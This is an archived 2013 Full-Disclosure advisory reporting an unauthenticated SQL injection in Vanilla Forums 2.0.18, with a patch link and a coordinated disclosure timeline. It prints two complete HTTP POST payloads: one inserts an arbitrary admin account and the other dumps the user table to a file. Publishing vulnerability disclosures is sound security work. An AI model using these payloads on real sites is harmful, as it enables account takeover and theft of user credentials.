lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 7 Apr 2013 14:42:36 +0200
From: "Ing. Michael F. Schratt, MSc" <mschratt@...-enterprise.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Vanilla Forums 2.0.18 / SQL-Injection / Insert
	arbitrary user & dump usertable

Product Name:
	Vanilla Forums

Vulnerable Version:
	Up to vanilla-core-2-0-18-4

Tested on:
	Windows Server 2003
	Apache 2.4.3
	PHP 5.4.7
	MySQL 5.5.27

Vulnerability Overview:
	SQL-Injection is possible, because$_POST arrays are not proper
sanitized.
	You do not need to be authenticated.

 Vulnerability Details:
	To insert an arbitrary user, a sample HTTP-Post Request looks as
follows:

	POST /[PATH]/vanilla/entry/signin HTTP/1.1
	Host: [HOST]
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0)
Gecko/20100101 Firefox/19.0
	Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	Cookie: [any cookie]
	Connection: keep-alive
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 399

	
Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&
	Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO
gdn_user 
	(UserID, Name, Password, HashMethod, DateInserted, Admin,
Permissions)
	VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0',
'Vanilla', 
	'2013-03-28 00:00:00', '1',
'');#]=abcd&Form%2FPassword=*&Form%2FSign_In=
	Sign+In&Checkboxes%5B%5D=RememberMe

	Indeed you has to take care of the proper encryption algorithm which
is currently used.
	As it is not possible to get the user table displayed on the
website, you could establish an attack as follows:

	POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1
	Host: [HOST]
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0)
Gecko/20100101 Firefox/19.0
	Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	Connection: keep-alive
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 255

	
Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select * 
	from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13&
	Form%2FRequest_a_new_password=Request+a+new+password

Update Link:
	
http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7

Credits:
	This vulnerability was discovered by Michael Schratt
	Mail: mail @ mfs-enterprise . com
	
Web: http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sq
l-injection-insert-arbitrary-user-dump-usertable/
	Twitter: @bl4ckw0rm

Timeline:
	Mar 28, 2013 – Discovered vulnerability
	Mar 28, 2013 – Contacted vanilla forums and asked for security
contact
	Mar 28, 2013 – Vanilla Forums responded
	Mar 28, 2013 – Transfered vulnerability details
	Apr 02, 2013 – Requested update
	Apr 04, 2013 – Requested update
	Apr 05, 2013 – Patch released
	Apr 05, 2013 – Public advisory released


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists